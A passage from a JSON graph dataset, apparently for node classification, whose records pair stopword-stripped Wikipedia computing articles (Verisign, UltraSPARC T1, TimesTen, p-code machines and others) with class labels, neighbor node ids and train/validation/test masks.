    "text": "Safelayer_Secure_Communications:safelayer secure communications safelayer secure communications s.a. spanish private company founded may 1999 develops software products public key infrastructure area digital security identity management electronic signature data protection safelayer technology part three major certification digital identity projects spain fábrica nacional de moneda timbre spanish id card dni electrónico spanish e-passport safelayer technology also secures nato x400 messaging system safelayer technology common criteria certified currently safelayer company whole family products cc eal4+ certified",
    "neighbors": [
      3521,
      8904,
      10831,
      5200,
      10962,
      6110,
      1496,
      5433,
      2558,
      7231
    ],
    "mask": "None"
  },
  {
    "node_id": 8860,
    "label": 8,
    "text": "Apache_Velocity:apache velocity apache velocity java-based template engine provides template language reference objects defined java code aims ensure clean separation presentation tier business tiers web application model–view–controller design pattern velocity open source software project hosted apache software foundation released apache license jon scott stevens derived name altivec velocity engine powerpc g4 chip common types applications use velocity following template processed velocity produces following html syntax overall concept apache velocity templates similar syntax older webmacro template engine also open source project",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      3877,
      8102,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      8628,
      4919,
      5047,
      8120,
      4538,
      1851,
      3260,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      10573,
      4944,
      1363,
      8408,
      11354,
      9179,
      7261,
      990,
      479,
      8799,
      865,
      10719,
      11235,
      8294,
      11111,
      8425,
      1258,
      747,
      5612,
      8810,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "None"
  },
  {
    "node_id": 8861,
    "label": 3,
    "text": "MIPS-X:mips-x mips-x microprocessor instruction set architecture developed follow-on project mips project stanford university team developed mips project supported defense advanced research projects agency started 1984 final form described set papers released 1986–87 unlike older cousin mips-x never commercialized workstation cpu mainly seen embedded designs based chips designed integrated information technology use digital video applications mips-x designed team architecturally similar instruction-set compatible mainline mips r-series processors processor obscure enough november 20 2005 support provided specialist developers green hills software notably missing gcc mips-x become important among dvd player firmware hackers since many dvd players especially low-end devices use chips based iit design produced ess technology central processor devices ess videodrive soc also include dsp co-processor decoding mpeg audio video streams programmer manual describes hsc instruction halt spontaneously combust instruction executed protection violation detected present -nsa variant processor platforms type instruction known halt catch fire",
    "neighbors": [
      8450,
      1298,
      9371,
      10786,
      3493,
      6311,
      682,
      9003,
      4269,
      9391,
      2224,
      4144,
      1462,
      7234,
      6084,
      3014,
      3142,
      2761,
      6607,
      2517,
      10985,
      9964,
      5358,
      5744,
      8048,
      8944,
      757,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8862,
    "label": 5,
    "text": "Exterior_Gateway_Protocol:exterior gateway protocol exterior gateway protocol egp routing protocol internet originally specified 1982 eric c. rosen bolt beranek newman david l. mills exterior gateway protocol egp protocol exchanging routing information two neighbor gateway hosts router network autonomous systems egp commonly used hosts internet exchange routing table information routing table contains list known routers addresses reach cost metric associated path router best available route chosen router polls neighbor intervals 120 480 seconds neighbor responds sending complete routing table egp-2 latest version egp egp developed bolt beranek newman early 1980s first described rfc 827 formally specified rfc 904 1984 egp simple reachability protocol unlike modern distance-vector path-vector protocols limited tree-like topologies early days internet egp version 3 egp3 used interconnect autonomous systems currently bgp version 4 accepted standard internet routing essentially replaced limited egp3 https //whatis.techtarget.com/definition/exterior-gateway-protocol-egp",
    "neighbors": [
      2085,
      686,
      1391,
      152,
      5978
    ],
    "mask": "Test"
  },
  {
    "node_id": 8863,
    "label": 3,
    "text": "UltraSPARC_T1:ultrasparc t1 sun microsystems ultrasparc t1 microprocessor known 14 november 2005 announcement development codename niagara multithreading multicore cpu designed lower energy consumption server computers cpu typically uses 72 w power 1.4 ghz afara websystems pioneered radical thread-heavy sparc design company purchased sun intellectual property became foundation coolthreads line processors starting t1 t1 new-from-the-ground-up sparc microprocessor implementation conforms ultrasparc architecture 2005 specification executes full sparc v9 instruction set sun produced two previous multicore processors ultrasparc iv iv+ ultrasparc t1 first microprocessor multicore multithreaded security built-in first release silicon hardware cryptographic units t1 unlike contemporary general purpose processor competing vendors processor available four six eight cpu cores core able handle four threads concurrently thus processor capable processing 32 threads concurrently ultrasparc t1 partitioned similar way high-end sun smp systems thus several cores partitioned running single group processes and/or threads cores deal rest processes system ultrasparc t1 designed scratch multi-threaded special-purpose processor thus introduces whole new architecture obtaining high performance rather try make core intelligent optimized sun goal run many concurrent threads possible maximize utilization core pipeline t1 cores less complex current high end processors order allow 8 cores fit die cores feature out-of-order execution sizable amount cache single-thread processors depend heavily large caches performance cache misses result wait data fetched main memory making cache larger probability cache miss reduced impact miss still t1 cores largely side-step issue cache misses multithreading core barrel processor meaning switches available threads cycle long-latency event occurs cache miss thread taken rotation data fetched cache background long-latency event completes thread made available execution sharing pipeline multiple threads may make thread slower overall throughput utilization core much higher also means impact cache misses greatly reduced t1 maintain high throughput smaller amount cache cache longer needs large enough hold working set recent cache misses thread benchmarks demonstrate approach worked well commercial integer multithreaded workloads java application servers enterprise resource planning erp application servers email lotus domino servers web servers benchmarks suggest core ultrasparc t1 powerful circa 2001 single-core single-threaded ultrasparc iii chip chip comparison significantly outperforms processors multithreaded integer workloads ultrasparc t1 contained 279 million transistors area 378 mm fabricated texas instruments ti 90 nm complementary metal–oxide–semiconductor cmos process nine levels copper interconnect core l1 16kb instruction cache 8kb data cache l2 cache 3mb l3 cache t1 processor found following products sun fujitsu computer systems ultrasparc t1 microprocessor unique strength weaknesses targeted specific markets rather used high-end number-crunching ultra-high performance applications chip targeted network-facing high-demand servers high-traffic web servers mid-tier java erp crm application servers often utilize large number separate threads one limitations t1 design single floating point unit fpu shared 8 cores making t1 unsuitable applications performing lot floating point mathematics however since processor intended markets typically make much use floating-point operations sun expect problem sun provides tool analysing application level parallelism use floating point instructions determine suitable use t1 t2 platform addition web application tier processing ultrasparc t1 may well suited smaller database applications large user count one customer published results showing mysql application running ultrasparc t1 server ran 13.5 times faster amd opteron server t1 first sparc processor supports hyper-privileged execution mode sparc hypervisor runs mode partition t1 system 32 logical domains run operating system instance currently solaris linux netbsd openbsd supported traditionally commercial software suites oracle database charge customers based number processors software runs early 2006 oracle changed licensing model introducing processor factor processor factor .25 t1 8-core t2000 requires 2-cpu license oracle processor core factor table since updated regularly new cpus came market q3 2006 ibm introduced concept value unit vu pricing core t1 30 pvus t2 core 50 pvus t3 70 pvus instead default value 100 pvus per core t1 offered single floating point unit shared 8 cores limiting usage hpc environments weakness mitigated follow-on ultrasparc t2 processor included 8 floating point units well additional features t1 available uniprocessor systems limiting vertical scalability large enterprise environments weakness mitigated follow-on victoria falls commercially known ultrasparc t2 plus well next generation sparc t3 sparc t4 ultrasparc t2+ sparc t3 sparc t4 offer single dual quad socket configurations t1 outstanding throughput massive numbers threads supported processor older applications burdened single thread bottlenecks occasionally exhibited poor overall performance single threaded application weakness mitigated follow-on sparc t4 processor t4 core count reduced 8 16 t3 cores made complex clock rate nearly doubled contributing faster single thread performance 300 500 increase previous generations additional effort made add critical thread api operating system would detect bottleneck would temporarily allocate resources entire core instead 1 8 threads targeted application processes exhibiting single threaded cpu bound behavior allowed t4 uniquely mitigate single threaded bottlenecks compromise overall architecture achieve massive multi-threaded throughput coolthreads tm architecture beginning ultrasparc t1 positive negative aspects certainly influential concurrent future designs sparc processors original ultrasparc t1 designed single cpu systems capable smp rock ambitious project intended support multiple-chip server architectures targeting traditional data-facing workloads databases seen follow-on sun smp processors ultrasparc iv rather replacement ultrasparc t1 t2 canceled timeframe oracle acquisition sun formerly known codename niagara 2 follow-on ultrasparc t1 t2 provides eight cores unlike t1 core supports 8 threads per core one fpu per core one enhanced cryptographic unit per core cpu embedded 10 gigabit ethernet network controllers february 2007 sun announced annual analyst summit third-generation simultaneous multithreading design code-named victoria falls taped october 2006 two-socket server 2 ru 128 threads 16 cores 65× performance improvement ultrasparc iii hot chips 19 conference sun announced victoria falls two-way four-way servers thus single 4-way smp server support 256 concurrent hardware threads april 2008 sun released 2-way ultrasparc t2 plus servers sparc enterprise t5140 t5240 october 2008 sun released 4-way ultrasparc t2 plus sparc enterprise t5440 server october 2006 sun disclosed niagara 3 built 45 nm process register reported june 2008 microprocessor 16 cores incorrectly suggesting core would 16 threads hot chips 21 conference sun revealed chip total 16 cores 128 threads according isscc 2010 presentation 16-core sparc soc processor enables 512 threads 4-way glueless system maximize throughput 6mb l2 cache 461gb/s 308-pin serdes i/o 2.4tb/s support required bandwidth six clock four voltage domains well power management circuit techniques optimize performance power variability yield trade-offs across 377mm die t4 cpu released late 2011 new t4 cpu drop 16 cores t3 back 8 cores used t1 t2 t2+ new t4 core design named s3 feature improved per-thread performance due introduction out-of-order execution well additional improved performance single-threaded programs 2010 larry ellison announced oracle offer oracle linux ultrasparc platform port scheduled available t4 t5 timeframe john fowler executive vice president systems oracle openworld 2014 said linux able run sparc point new t5 cpu features 128 threads 16 cores manufactured 28 nanometer technology march 21 2006 sun made ultrasparc t1 processor design available gnu general public license via opensparc project published information includes",
    "neighbors": [
      5378,
      9090,
      9731,
      1801,
      4235,
      398,
      6926,
      1809,
      4241,
      7702,
      1818,
      10789,
      1707,
      2731,
      5677,
      10926,
      3247,
      9137,
      6322,
      7218,
      10675,
      1461,
      823,
      4664,
      6071,
      4285,
      6464,
      7104,
      9665,
      8644,
      3911,
      1480,
      8523,
      2895,
      3919,
      4561,
      597,
      731,
      6107,
      2269,
      8539,
      225,
      9569,
      9955,
      10340,
      7270,
      10984,
      11626,
      7022,
      10734,
      1776,
      10612,
      11125,
      630,
      1399,
      11636,
      3323,
      1788
    ],
    "mask": "None"
  },
  {
    "node_id": 8864,
    "label": 5,
    "text": "Internet_Streaming_Media_Alliance:internet streaming media alliance internet streaming media alliance isma non-profit corporation founded december 2000 apple computer cisco systems kasenna philips sun microsystems stated mission accelerate market adoption open standards streaming progressive download rich media types internet protocols ip alliance representatives various points streaming work-flow time isma created standards already existed audio video codecs e.g mpeg real time streaming transport ip networks e.g rtp isma worked selecting profiles describing payload formats resolving various options standards isma specifications typically adopted existing specifications however specifications exist isma could create isma also performed interoperability testing allowing members ensure products conformed isma standards interoperate isma released several specifications transport rich media ip",
    "neighbors": [
      5472,
      9665,
      9381,
      11082,
      6834,
      10270
    ],
    "mask": "None"
  },
  {
    "node_id": 8865,
    "label": 4,
    "text": "Verisign:verisign verisign inc. american company based reston virginia united states operates diverse array network infrastructure including two internet thirteen root nameservers authoritative registry generic top-level domains country-code top-level domains back-end systems top-level domains verisign also offers range security services including managed dns distributed denial-of-service ddos attack mitigation cyber-threat reporting 2010 verisign sold authentication business unit – included secure sockets layer ssl certificate public key infrastructure pki verisign trust seal verisign identity protection vip services – symantec 1.28 billion deal capped multi-year effort verisign narrow focus core infrastructure security business units symantec later sold unit digicert 2017 verisign former chief financial officer cfo brian robins announced august 2010 company would move original location mountain view california dulles northern virginia 2011 due 95 company business east coast company incorporated delaware verisign founded 1995 spin-off rsa security certification services business new company received licenses key cryptographic patents held rsa set expire 2000 time-limited non-compete agreement new company served certificate authority ca initial mission providing trust internet electronic commerce digital authentication services products prior selling certificate business symantec 2010 verisign 3 million certificates operation everything military financial services retail applications making largest ca world 2000 verisign acquired network solutions operated tlds agreements internet corporation assigned names numbers icann united states department commerce core registry functions formed basis verisign naming division company largest significant business unit 2002 verisign charged violation securities exchange act verisign divested network solutions retail domain name registrar business 2003 retaining domain name registry wholesale function core internet addressing business year ended december 31 2010 verisign reported revenue 681 million 10 616 million 2009 verisign operates two businesses naming services encompasses operation top-level domains critical internet infrastructure network intelligence availability nia services encompasses ddos mitigation managed dns threat intelligence august 9 2010 symantec completed approximately 1.28 billion acquisition verisign authentication business including secure sockets layer ssl certificate services public key infrastructure pki services verisign trust services verisign identity protection vip authentication service majority stake verisign japan deal capped multi-year effort verisign narrow focus core infrastructure security business units following ongoing controversies regarding symantec handling certificate validation culminated google untrusting symantec-issued certificates chrome web browser symantec sold unit digicert 2017 verisign share price tumbled early 2014 hastened u.s. government announcement would relinquish oversight internet domain-naming system non-government entity ultimately internet corporation assigned names numbers chose continue verisign role root zone maintainer two entered new contract 2016 verisign core business naming services division division operates authoritative domain name registries two internet important top-level domains also contracted registry operator .name .gov top-level domains well country code top-level domains cocos islands tuvalu addition verisign primary technical subcontractor top-level domains respective registry operators non-profit organizations role verisign maintains zone files particular domains hosts domains domain servers registry operators wholesalers internet domain names domain name registrars act “ retailers ” working directly consumers register domain name address verisign also operates two internet thirteen root servers identified letters a-m verisign operates “ ” “ j ” root servers root servers form top hierarchical domain name system supports modern internet communication verisign also generates globally recognized root zone file also responsible processing changes file ordered icann via iana approved u.s. department commerce changes root zone originally distributed via root server distributed thirteen servers via separate distribution system verisign maintains verisign one 12 root server operators operate one thirteen root nameservers j root servers anycasted ” longer operated company datacenters means increase redundancy availability mitigate threat single point failure 2016 department commerce ended role managing internet dns transferred full control icann initially negatively impacted verisign stock icann eventually chose contract verisign continue role root zone maintainer verisign naming services division dates back 1993 network solutions awarded contract national science foundation manage operate civilian side internet domain name registrations network solutions sole registrar internet non governmental generic top-level domains 1998 icann established new system competitive registrars implemented result new policies network solutions divided two divisions nsi registry division established manage authoritative registries company would still operate separated customer-facing registrar business would compete registrars divisions even geographically split nsi registry moving corporate headquarters herndon virginia nearby dulles virginia 2000 verisign purchased network solutions taking role internet dns nsi registry division eventually became verisign naming services division remainder network solutions later sold verisign 2003 pivotal equity group verisign also offers trust seal products e-commerce sites competing space truste bbb online webtrust following sale authentication services division 2010 verisign relocated former headquarters mountain view california headquarters naming division sterling virginia originally nsi registry headquarters verisign began shopping year new permanent home shortly moving signed lease 12061 bluemont way reston former sallie mae headquarters 2010 decided purchase building september 2011 since terminated lease current space two buildings lakeside loudoun technology center company completed move end november 2011 new headquarters located reston town center development become major commercial business hub region addition reston headquarters verisign owns three data center properties one 22340 dresden street dulles virginia far corporate headquarters within large broad run technology park one 21 boulden circle new castle delaware third fribourg switzerland three data centers mirrored disaster one data center minimal impact operations verisign also leases office suite downtown washington d.c. k street government relations office located also leased server space numerous internet data centers around world dns constellation resolution sites located mostly major internet peering facilities one facility equinix ashburn datacenter ashburn virginia one world largest datacenters internet transit hubs january 2001 verisign mistakenly issued two class 3 code signing certificates individual claiming employee microsoft mistake discovered certificates revoked two weeks later routine audit verisign code-signing certificates specify certificate revocation list distribution point way automatically detected revoked placing microsoft customers risk microsoft later release special security patch order revoke certificates mark fraudulent 2002 verisign sued domain slamming – transferring domains registrars making registrants believe merely renewing domain name although found broken law barred suggesting domain expire claim transfer actually renewal september 2003 verisign introduced service called site finder redirected web browsers search service users attempted go non-existent domain names icann asserted verisign overstepped terms contract u.s. department commerce essence grants verisign right operate dns verisign shut service subsequently verisign filed lawsuit icann february 2004 seeking gain clarity services could offer context contract icann claim moved federal california state court august 2004 late 2005 verisign icann announced proposed settlement defined process introduction new registry services registry documents concerning settlements available icann.org icann comments mailing list archive documents criticisms raised regarding settlement additionally verisign involved matter decided ninth circuit keeping icann charter introduce competition domain name marketplace verisign agreed give operation top-level domain 2003 exchange continuation contract operate time 34 million registered addresses mid-2005 existing contract operation expired five companies including verisign bid management verisign enlisted numerous telecom heavyweights including microsoft ibm sun microsystems mci others assert verisign perfect record operating proposed verisign continue manage dns due critical importance domain underlying numerous backbone network services verisign also aided fact several bidders foreign based raised concerns national security circles june 8 2005 icann announced verisign approved operate 2011 information bidding process available icann july 1 2011 icann announced verisign approval operate .net extended another six years 2017 february 2012 verisign revealed network security repeatedly breached 2010 verisign stated breach impact domain name system dns maintain would provide details loss data verisign widely criticized disclosing breach earlier apparently attempting hide news october 2011 sec filing lack details provided verisign clear whether breach impacted certificate signing business acquired symantec late 2010 according oliver lavery director security research ncircle trust site using verisign ssl certificates without clarity logical answer ” november 29 2010 u.s. immigration customs enforcement u.s. ice issued seizure orders 82 web sites internet addresses reported involved illegal sale distribution counterfeit goods registry operator verisign performed required takedowns 82 sites order law enforcement informationweek reported verisign say received sealed court orders directing certain actions taken respect specific domain names removal 82 websites cited impetus launch dot-p2p project order create decentralized dns service without centralized registry operators following disappearance wikileaks following week forced move wikileaks.ch swiss domain electronic frontier foundation warned dangers key pieces internet infrastructure dns name translation corporate control",
    "neighbors": [
      1410,
      3843,
      517,
      9863,
      11,
      7820,
      32,
      7078,
      10026,
      10801,
      6834,
      11584,
      7107,
      9285,
      11333,
      2887,
      2504,
      10831,
      11605,
      8921,
      7899,
      8668,
      735,
      1504,
      225,
      9569,
      8807,
      2154,
      1266,
      1650,
      8310,
      5371,
      11646
    ],
    "mask": "Test"
  },
  {
    "node_id": 8866,
    "label": 9,
    "text": "GOLD_(parser):gold parser gold free parsing system designed support multiple programming languages system uses dfa lexical analysis lalr algorithm parsing algorithms state machines use tables determine actions gold designed around principle logically separating process generating lalr dfa parse tables actual implementation parsing algorithms allows parsers implemented different programming languages maintaining grammars development process gold system consists three logical components builder engine compiled grammar table file definition functions intermediary builder engine builder primary component main application system builder used analyze syntax language specified grammar construct lalr dfa tables process ambiguities grammar reported essentially task performed compiler-compilers yacc antlr lalr dfa parse tables successfully constructed builder save data compiled grammar table file allows information reopened later builder used one engines currently builder component available windows 32-bit operating systems features builder compiled grammar table file used store table information generated builder unlike builder runs single platform engine component written specific programming language and/or development platform engine implements lalr dfa algorithms since different programming languages use different approaches designing programs implementation engine vary result implementation engine written visual basic 6 differ greatly one written ansi c. currently engines gold implemented following programming languages platforms new engines implemented using source code existing engines starting point gold grammars based directly backus–naur form regular expressions set notation following grammar defines syntax minimal general-purpose programming language called simple first step consists writing testing grammar language parsed grammar written using text editor notepad editor built builder stage coding required grammar complete analyzed builder lalr dfa parse tables constructed ambiguities problems grammar reported afterwards tables saved compiled grammar table file used later parsing engine point gold parser builder longer needed final stage tables read engine point development process dependent selected implementation language",
    "neighbors": [
      10560,
      8554,
      8524,
      5677,
      5165,
      847,
      6797,
      7983,
      5399,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 8867,
    "label": 2,
    "text": "Openwall_Project:openwall project openwall project source various software including openwall gnu/*/linux owl security-enhanced linux distribution designed servers openwall patches security extensions included many major linux distributions name implies openwall gnu/*/linux draws source code design concepts numerous sources importantly project usage linux kernel parts gnu userland others include bsds openbsd openssh suite inspiration behind blowfish-based crypt password hashing compatible openbsd implementation issues international journal proof-of-concept get fuck poc||gtfo mirrored openwall project samizdat licence first issue 00 published 2013 issue 02 featured chaos computer club issue 07 2015 homage dr. dobb journal could rendered codice_1 codice_2 codice_3 codice_4 openwall project maintains also list algorithms source code public domain software lwn.net reviewed openwall linux 3.0 wrote",
    "neighbors": [
      1474,
      8066,
      2717,
      4956,
      10631,
      4841,
      4140,
      9646,
      7983,
      4242,
      8787,
      5397,
      823,
      6617,
      1820,
      733,
      7135
    ],
    "mask": "Test"
  },
  {
    "node_id": 8868,
    "label": 9,
    "text": "P-code_machine:p-code machine computer programming p-code machine portable code machine virtual machine designed execute p-code assembly language hypothetical cpu term applied generically machines java virtual machine matlab precompiled code specific implementations famous p-machine pascal-p system particularly ucsd pascal implementation among whose developers p p-code construed mean pseudo often portable pseudo-code thus meaning instructions pseudo-machine although concept first implemented circa 1966 o-code bcpl p code euler language term p-code first appeared early 1970s two early compilers generating p-code pascal-p compiler 1973 nori ammann jensen hageli jacobi pascal-s compiler 1975 niklaus wirth programs translated p-code either interpreted software program emulates behavior hypothetical cpu translated machine code cpu program run executed sufficient commercial interest hardware implementation cpu specification may built e.g. pascal microengine version java processor compared direct translation native machine code two-stage approach involving translation p-code execution interpreter just-in-time compiler offers several advantages one significant disadvantages p-code execution speed sometimes remedied use jit compiler p-code often also easier reverse-engineer native code early 1980s least two operating systems achieved machine independence extensive use p-code business operating system bos cross-platform operating system designed run p-code programs exclusively ucsd p-system developed university california san diego self-compiling self-hosted operating system based p-code optimized generation pascal programming language 1990s translation p-code became popular strategy implementations languages python microsoft p-code visual basic java bytecode java go programming language uses generic portable assembly form p-code implemented ken thompson extension work plan 9 bell labs unlike clr bytecode jvm bytecode stable specification go build tools emit bytecode format used later time go assembler uses generic assembly language intermediate representation go executables machine-specific statically linked binaries like many p-code machines ucsd p-machine stack machine means instructions take operands stack place results back stack thus add instruction replaces two topmost elements stack sum instructions take immediate argument like pascal p-code strongly typed supporting boolean b character c integer real r set pointer types natively simple instructions unlike stack-based environments forth java virtual machine similar real target cpu p-system one stack shared procedure stack frames providing return address etc arguments local instructions three machine registers point stack grows upwards also present constant area heap growing towards stack np new pointer register points top lowest used address heap ep gets greater np machine memory exhausted fifth register pc points current instruction code area stack frames look like procedure calling sequence works follows call introduced codice_1 specifies difference nesting levels remember pascal supports nested procedures instruction mark stack i.e reserve first five cells stack frame initialise previous ep dynamic static link caller computes pushes parameters procedure issues call user procedure codice_1 number parameters codice_3 procedure address save pc return address cell set procedure address new pc user procedures begin two instructions first sets sp mp codice_4 second sets ep sp codice_5 codice_4 essentially specifies space reserved locals plus number parameters plus 5 codice_5 gives number entries needed locally stack memory exhaustion checked point returning caller accomplished via codice_8 giving return type r c b p return value return value stored appropriate cell previously types except p returning leave value stack instead calling user procedure cup standard procedure codice_9 called standard procedures pascal procedures like codice_10 codice_11 codice_12 codice_13 etc peculiarly codice_14 p-code instruction instead niklaus wirth specified simple p-code machine 1976 book algorithms data structures programs machine 3 registers program counter p base register b top-of-stack register 8 instructions code machine written pascal machine used run wirth pl/0 pascal subset compiler used teach compiler development",
    "neighbors": [
      6147,
      7941,
      9739,
      11411,
      1435,
      7326,
      1952,
      8609,
      5412,
      5677,
      7983,
      1841,
      6705,
      9911,
      9657,
      10173,
      3904,
      1349,
      8647,
      8140,
      8524,
      11596,
      847,
      10703,
      3413,
      3160,
      217,
      7775,
      6112,
      6631,
      5354,
      8554,
      9714,
      3960,
      6778,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8869,
    "label": 5,
    "text": "Internet_Open_Trading_Protocol:internet open trading protocol internet open trading protocol iotp protocol provides inter-operable standardized payment system independent framework internet commerce tries replicate real-world trading processes closely possible iotp systems include variety different payment systems including digital cash electronic checks debit cards within protocol various payment transaction data contained within specific iotp messages customer merchant credit checker certifier bank delivery handler",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 8870,
    "label": 2,
    "text": "Android_Developer_Challenge:android developer challenge android developer challenge adc launched google 2008 aim providing awards high-quality mobile applications built android platform november 2009 winners android developers challenge ii selected two rounds scoring thousands android users well official panel judges overall winners adc ii sweetdreams doodle wavesecure android software stack mobile devices includes operating system middleware key applications android sdk provides tools apis necessary begin developing applications run android-powered devices android developer challenge competition innovative applications android google offered us 10 million prizes distributed adc adc ii entries judged panel experts fields mobile devices cellular telecommunications software development technology innovation google selected judges member organizations open handset alliance google mobile experts android developer challenge first announced january submissions accepted 2 january 14 april 2008 participants 70 countries total 1,788 entries adc immediate success android developers blog reported submission rate 170+ submissions per hour 14 april developers united states accounted one-third total applications rest came countries germany japan china india canada france uk many others entries represented diverse range application areas including games social-networking applications utilities productivity developer tools panel 100 judges received judging packets laptops preloaded submissions consistent fair environment judge submissions three weeks rigorous analysis judges released list 50 first round winners eligible participate final round 50 promising entries announced 5 may 2008 received 25,000 award fund development finalists given deadline 30 june 2008 submit applications final round competition concluded announcement ten teams received 275,000 ten teams received 100,000 entire list 275,000 award recipients 100,000 award recipients finalists judges viewed adc ii announced 27 may 2009. calling developers submit apps one ten specially-designated adc ii categories august categories applicants allowed submit applications single category winners selected two rounds scoring thousands android users well official panel judges adc ii contest open applications made publicly available android market prior august 1 2009 additionally applications entered adc contest ineligible adc ii contest regardless whether winning apps similarly updated versions applications entered adc 1 contest ineligible adc ii september 2009 users android-powered handsets could access android market able obtain special adc ii judging application android market app could download test rank applications submitted challenge users choosing participate review process downloaded submitted apps randomly rated along number criteria resulting final score app results first round generated top 20 applications 10 categories 200 apps total went second round first round adc ii closed 6 october 2009 first-round winners announced 5 november 2009 voting second round opened day ended november 25 android users able download final top 20 applications category evaluate manner first round using adc 2 judging app end voting period applications category ranked community vote constituting 40 final judging score along public ranking team google-selected judges evaluated applications scores constituted 60 final score google announced top winners adc ii november 30 sweetdreams doodle wavesecure nominated overall winners challenge furthermore 1st 2nd 3rd prizes awarded 10 categories",
    "neighbors": [
      4995,
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      6057,
      5677,
      7595,
      7983,
      10537,
      3380,
      5431,
      8122,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      11252,
      7548,
      2045,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 8871,
    "label": 1,
    "text": "TimesTen:timesten timesten in-memory relational database management system persistence recoverability originally designed implemented hewlett-packard labs palo alto california timesten spun separate startup 1996 acquired oracle corporation 2005 data within timesten database located physical memory ram means data operation requires disk i/o unlike traditional disk-optimized relational databases oracle database db2 informix sql server whose designs must contain algorithms attempt minimize disk accesses timesten provides applications short consistent response-times high throughput required applications database-intensive workloads memory operates far faster hard disk timesten used applications service-level agreements require low predictable response times telecommunications real-time financial-services trading applications network equipment large web applications also unlike memory-caching systems use key-value pairs memcached hazelcast coherence timesten accessed standard interfaces provides functionality sql query language applications data residing oracle database utilize timesten database caching option distinct oracle database in-memory timesten functions in-memory cache database front oracle database timesten runs major unix/linux platforms various windows platforms 32-bit 64-bit modes timesten in-memory database management technology provides fast data access time assumes data reside physical memory ram run time result low response times enable high throughput even commodity hardware timesten functionality contained set shared libraries application developers link application allowing timesten execute part application process shared library approach different conventional rdbms systems database essentially set distinct processes applications connect via form inter-process communication communication may take form client/server connection spanning network may form intra-system ipc unix domain socket connection shared memory based connection mechanism data active timesten database stored shared memory segment allowing multiple timesten databases active concurrently also allowing application simultaneously access several timesten databases system 64-bit platforms size timesten database practically limited amount ram available host computer one customer production timesten database approaching two terabytes size utilized on-line transaction processing starting timesten requires starting background process called timesten main daemon starts multiple timesten subdaemon processes manage database created system subdaemon processes perform database operations client applications connect traditional disk-based relational databases typically use tcp/ip another ipc mechanism communicate database server process timesten applications reside server timesten database connect directly in-memory image database using timesten direct driver eliminating need inter-process communication kind thus providing extremely fast performance application resides remote server application also connect timesten database using traditional client/server model data access timesten data exists ram however timesten utilize non-volatile storage hard disk database persistence recoverability timesten database stores transactional data modifications in-memory log buffer eventually persisted disk form transaction log files addition timesten also persists snapshots in-memory database called checkpoint files disk combination checkpoint files transaction log files allow timesten provide recoverability event system failure timesten implements parallel log manager order maximize throughput large smp systems default timesten operates non-durable commit mode mode commit operation occurs purely memory writing log records transaction disk occurs asynchronously commit provides low response times high throughput cost potential small amount data loss event system failure true synchronous commit mode durable commit mode also provided mode avoids possibility data loss cost reduced performance operating synchronous commit mode timesten provides automatic group commit optimization timesten allows architect developer balance performance versus data safety providing control commit mode three different levels database connection transaction another option data protection high-availability use timesten replication timesten replication mechanism enables highly available system sending database updates two hosts timesten replication master host sends updates one subscriber hosts timesten recommends active-standby pair configuration highest availability active-standby pair consists two master databases active standby database addition active standby databases multiple subscriber databases configured serve disaster recovery copies read-only farms replication timesten implemented replication agent daemon process aims every timesten database involved replication replication agent sends receives updates databases communicating replication agents databases involved replication scheme change capture via log-mining in-memory optimization normal operating conditions change records captured in-memory log buffer need disk i/o communication replication agents via efficient stream-oriented protocol built top regular tcp/ip connections replication agent multi-threaded 11.2.2 release timesten supports parallel replication increased throughput replication workload automatically parallelized maximize throughput still maintaining correctness timesten provides capability cache data oracle database source used fashion timesten referred oracle in-memory database cache imdb cache oracle database product option utilize oracle database caching one defines one sql objects known cache groups cache group set one related database tables allows subsets rows and/or columns database tables cache group must defined primary key unique index declared across set non-nullable columns must related parent-child hierarchy via primary key-foreign key constraints sql predicates used control data cached cache group defined cache group loaded allowing oracle database data cached timesten applications read write cache groups data modifications synchronized corresponding oracle database tables either automatically manually timesten provides event notification mechanism transaction log api xla xla provides functions allow applications notified data changes occurring timesten tables also ddl occurring timesten database xla also used conjunction materialized views simplify process monitoring changes made rows spanning multiple tables xla works mining timesten transaction log stream similar manner replication agent database application deployments include oracle database want use timesten in-memory cache database use xla capture updates via custom application code apply updates backend database timesten founded hp labs marie-anne neimat sherry listgarten kurt shoens name smallbase hp jean-rené bouvier decided embed smallbase hp opencall made first commercial use product 1995 1996 product spun separate venture capital funded startup company based mountain view california leadership ceo jim groff product became popular telecommunications equipment response times milliseconds even microseconds required applications like packet switching company 90 employees profitable acquired oracle corporation 2005 acquisition neimat remained director timesten development oracle adding many oracle database features product support pl/sql integration oracle sql developer oracle enterprise manager",
    "neighbors": [
      1539,
      5384,
      6920,
      10632,
      9867,
      6797,
      3219,
      11030,
      5531,
      8353,
      8994,
      1707,
      4781,
      2222,
      5677,
      10286,
      10413,
      9010,
      9012,
      823,
      10553,
      1594,
      9665,
      6338,
      6850,
      6341,
      597,
      9177,
      6107,
      1755,
      860,
      2269,
      734,
      1250,
      10340,
      7022,
      8434,
      5492,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 8872,
    "label": 2,
